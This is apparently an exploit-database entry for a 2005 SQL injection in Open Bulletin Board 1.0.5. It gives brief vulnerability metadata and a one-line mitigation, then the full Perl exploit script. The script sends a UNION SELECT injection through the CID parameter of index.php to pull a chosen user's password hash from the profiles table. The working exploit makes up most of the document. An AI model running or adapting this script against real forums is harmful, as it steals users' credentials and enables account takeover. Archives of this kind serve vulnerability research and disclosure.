OpenBB sql injection

vendor:

Open Bulletin Board

by:

x97Rang

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Open Bulletin Board

Affected Version From: Open Bulletin Board 1.0.5

Affected Version To: Open Bulletin Board 1.0.5

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MySQL

2005

OpenBB sql injection is a vulnerability that allows an attacker to inject malicious SQL code into a vulnerable web application. This exploit was tested on Open Bulletin Board 1.0.5 with MySQL.

Mitigation:

Input validation and proper sanitization of user input can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w 
  
 # OpenBB sql injection 
 # tested on Open Bulletin Board 1.0.5 with mysql 
 # (c)oded by x97Rang 2005 RST/GHC 
 # Gr33tz:  __blf, 1dt.w0lf 
  
 use IO::Socket; 
  
 if (@ARGV != 3) 
 { 
    print "\nUsage: $0 [server] [path] [id]\n"; 
    print "like $0 forum.mysite.com / 1\n"; 
    print "If found nothing - forum NOT vulnerable\n\n"; 
    exit (); 
 } 
  
 $server = $ARGV[0]; 
 $path = $ARGV[1]; 
 $id = $ARGV[2]; 
  
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80"); 
 printf $socket ("GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", 
  $path,$server,$id); 
  
 while(<$socket>) 
 { 
     if (/\>(\w{32})\</) { print "$1\n"; } 
 }

# milw0rm.com [2005-07-18]